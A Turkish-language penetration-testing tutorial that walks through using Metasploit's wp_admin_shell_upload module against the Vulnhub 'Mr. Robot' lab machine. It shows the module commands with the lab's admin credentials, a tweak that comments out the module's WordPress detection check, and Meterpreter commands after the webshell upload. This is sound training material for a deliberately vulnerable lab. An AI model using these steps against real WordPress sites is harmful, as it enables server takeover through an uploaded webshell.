MSF wp_admin_shell_upload İstismar Modülü ile WordPress Yönetim Arayüzünden İşletim Sistemine Erişim Sağlanması

1
740
views
Web uygulaması sızma testleri sırasında erişilen web uygulaması üzerinden işletim sisteminde kod çalıştırılabilir. Bu yazıda yönetici hakları ile erişim sağlanan WordPress yönetim arayüzü MSF wp_admin_shell_upload istismar modülü ile hazırlanan bir PHP kodunun (webshell backdoor) hedefe otomatik olarak yüklenmesi yolu ile istismar edilecek ve işletim sistemine Meterpreter ile erişim sağlanacaktır.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Not: Yazıda kullanılan Mr.Robot sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/mr-robot-1,151/

Mr.Robot zafiyetli sanal makineye ait WordPress yönetim arayüzünde açılan oturum aşağıdaki gibidir.

 

WordPress yönetim arayüzü üzerinde yönetici yetkilerine sahipken hedef sisteme PHP kodu yüklemeyebilmek için MSF wp_admin_shell_upload istismar modülü kullanılabilir.

search wp_admin_shell_upload

 

Bulunan MSF modülü seçilir ve seçenekleri incelenir.

use exploit/unix/webapp/wp_admin_shell_upload
show options

 

Seçenekleri ayarlanır.

set RHOST 192.168.2.58
set USERNAME elliot
set PASSWORD ER28-0652

 

Modül başlatılır.

run

 

Ancak WordPress kurulu olmadığına dair bir hata mesajı alınmaktadır.

The target does not appear to be using WordPress

 

Hatanın ayrıntısı incelendiğinde – değişken adlarına göre – WordPress’in kurulu olmadığından değil, çevrim içi olarak çalışmadığı için hata alındığı görülmektedir.

locate wp_admin_shell_upload
grep -n “The target does not appear to be using WordPress” /usr/share/metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb

 

Bu kontrol yorum satırı olarak değiştirildiğinde sonraki komutların çalışması beklenmektedir.

 

Modüller yeniden yüklendiğinde ve ilgili modül çalıştırıldığında Meterpreter bağlantısının elde edildiği görülür.

reload
run

 

Elde edilen erişimin (3056 ID’li proses) WordPress uygulaması üzerinden sağlandığı görülebilir.

getuid
getpid
shell
ps -ef | grep 3056

 

Kaynak:

 

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

1 YORUM

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.